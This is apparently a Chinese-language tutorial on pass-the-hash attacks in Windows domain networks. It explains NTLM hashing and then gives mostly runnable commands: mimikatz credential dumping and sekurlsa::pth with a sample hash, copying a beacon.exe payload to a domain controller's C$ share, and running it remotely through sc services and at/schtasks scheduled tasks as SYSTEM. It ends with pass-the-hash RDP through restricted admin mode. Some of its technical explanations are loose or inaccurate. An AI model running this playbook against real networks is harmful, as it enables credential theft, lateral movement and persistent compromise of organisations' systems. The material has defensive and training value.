内网渗透之哈希传递

哈希传递（NTLM哈希）

内网渗透中找到域控IP后使用什么攻击手法拿下域控：

• 扫描域控开放端口。因为域控会开放远程连接：windows开放3389端口，Linux开放22端口

概念

早期SMB协议铭文在网络上传输数据，后来诞生了LM验证机制，LM机制由于过于简单，微软提出了WindowsNT挑战/响应机制，这就是NTLM（认证协议）

LM

NTLM

三次编码：

• 十六进制编码
• Unicode编码
• 最后进行MD4加密

MD4算法不可逆 无法进行逆推

哈希传递只针对相同密码进行攻击，哈希传递要求对方的密码和自己的密码相同，同密码是存在风险的，哈希传递可以实现无明文密码绕过认证，进行登录

原理

什么是hash传递？

哈希传递（Pass The Hash, PTH）顾名思义，就是利用哈希去登录内网中的其他机器，而不是通过明文密码登录的方式。通过哈希传递，攻击者不需要花时间破解哈希值得到明文，往往会使用工具将哈希值传递到其他计算机中进行登录验证。

哈希传递必须要有哈希值，在内网渗透的时候拿下了一台主机，windows中明文密码无法抓取，电脑的密码文件存储在SAM文件中，而SAM中存储的是哈希值（NTLM哈希）。NTLM哈希值可以通过工具抓取。

利用

当域内的用户想要访问域中的某个服务时，输入用户名和密码访问，本机kerberos服

务会向KDC的AS认证服务发送⼀个AS-REQ认证请求。该请求包中包含： 请求的用户名、客户端主机名、加密类型 和 Authenticator(用户NTLM Hash加密的时间戳)以及⼀些其他信息在AS-REQ阶段，是用用户密码Hash加密的Authenticator，所以也就造成了hash传递。我们只需要获取域用户Hash，同时目标机器开放smb服务，就可以进行Hash传递攻击。

mimikatz运行前提是system用户，mimikatz在windows系统中可以利用管理员用户自动提升为system用户

privilege::debug 提升权限(注：需以管理员权限运行)
sekurlsa::logonpasswords 获取内存中保存的登录信息
    
sekurlsa::pth /user:administrator/domain:qf.com/ntlm:a803cf45d87009c404eb89df4b1ae94c
弹出新窗口
    
dir \\域控IP\c$

pth：pass the hash告诉猕猴桃要进行哈希传递了

弹出窗口表示装配好攻击设备，想攻击哪个主机就通过dir告诉要攻击哪个主机的IP

#sc命令创建计划任务
copy beacon.exe \\10.10.10.254\c$
#sc命令远程创建名为test的服务
sc \\10.10.10.254 create test binpath="c:\beacon.exe"
#远程查询名为test的服务
sc \\10.10.10.254 query test
#远程启动名为test的服务
sc \\10.10.10.254 start test
#远程删除名为test的服务
sc \\10.10.10.254 delete test
#at命令(计划任务) at命令在早期的Windows系统中⽀持，⽽新版本Windows已经⽤
schtasks命令取代at命令了。
#查看⽬标系统时间
net time \\10.10.10.254
#将本⽬录下的指定⽂件复制到⽬标系统中
copy vps.exe \10.10.10.254\c$
#使⽤at创建计划任务
at \10.10.10.254 14:37 C:\vps.exe
#清除at记录
at \10.10.10.254 做业ID /delete
#使⽤at命令执⾏，将执⾏结果写⼊本地⽂本⽂件，再使⽤type命令查看该⽂件的内容
at \10.10.10.254 17:00:00 cmd.exe /c "ipconfig > C:/1.txt "
#查看⽣成的1.txt⽂件
type \\10.10.10.254\C$\1.txt
#schtasks命令(计划任务)
#在⽬标主机10.10.10.254上创建⼀个名为test的计划任务,启动权限为system，启动
时间为每隔⼀⼩时启动⼀次
schtasks /create /s 10.10.10.254 /tn test /sc HOURLY /mo 1 /tr
c:\beacon.exe /ru system /f /U administrator /P 1234.com
其他启动时间参数：
/sc HOURLY 每⼩时启动⼀次
/sc onlogon ⽤户登录时启动
/sc onstart 系统启动时启动
/sc onidle 系统空闲时启动
#查询该test计划任务
schtasks /query /s 10.10.10.254 /U administrator -P 1234.com |
findstr test
#启动该test计划任务
schtasks /run /s 10.10.10.254 /i /tn "test" /U administrator -P
1234.com
#删除该test计划任务
schtasks /delete /s 10.10.10.254 /tn "test" /f /U administrator -P
1234.com

hash传递获取域控RDP

privilege::debug
sekurlsa::pth /user:administrator /domain:xiusafe.com
/ntlm:a803cf45d87009c404eb89df4b1ae94c "/run:mstsc.exe
/restrictedadmin"

总结

哈希传递是针对相同密码的用户认证之间发起的攻击，如果当域内的其他主机密码和失陷主机的密码一致，那么哈希值一致，哈希值一致就能够不使用明文密码的登陆对方主机的远程桌面，查看对方主机的C盘查看文件等操作。